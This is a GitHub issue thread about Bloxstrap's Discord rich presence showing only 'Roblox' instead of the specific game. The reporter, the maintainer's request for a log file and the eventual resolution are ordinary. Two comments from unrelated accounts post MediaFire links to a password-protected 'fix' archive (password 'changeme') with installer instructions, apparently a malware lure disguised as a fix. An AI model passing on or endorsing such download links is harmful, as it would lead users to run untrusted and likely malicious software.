### ISSUE TITLE
[BUG] Discord RPC not working properly

### ISSUE THREAD

**Issue by SeerthWeerth** [pizzaboxer/bloxstrap#2761]
### Acknowledgement of preliminary instructions

- [X] I have read the preliminary instructions, and I am certain that my problem has not already been addressed.
- [x] I have thoroughly looked through the available Wiki articles and could not find a solution to my problem.
- [X] I am using the latest version of Bloxstrap.
- [ ] I did not answer truthfully to all the above checkboxes.

### What problem did you encounter?

If I open a game with Bloxstrap, it will only display that I'm playing Roblox, but not the specific game.

![image](https://github.com/user-attachments/assets/ef7a7451-ac0e-4dd2-9591-1ffe245a61c1)

I have the correct Activity Privacy settings enabled. I use Vencord, but I do not have the NoRPC plugin enabled. 

![image](https://github.com/user-attachments/assets/d3f8e76c-4ed2-4a7f-9f2a-167895b98356)
![image](https://github.com/user-attachments/assets/4496cf89-f384-489e-8801-a22fb807cb2b)

I am not running Discord as an Administrator, and I am not using a VPN.

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by pizzaboxer** [comment]
Is this still occurring? Rich presence wasn't working for me either around this time as Discord wasn't working properly for everyone.

**Comment by SeerthWeerth** [comment]
As of currently, the issue persists.

**Comment by pizzaboxer** [comment]
Start a Roblox game, then get Bloxstrap's latest log file from `%localappdata%\Bloxstrap\Logs`, and send it here.

**Comment by SeerthWeerth** [comment]
[Bloxstrap_20240829T221912Z.log](https://github.com/user-attachments/files/16807239/Bloxstrap_20240829T221912Z.log)

**Comment by SeerthWeerth** [comment]
The issue is resolved now.
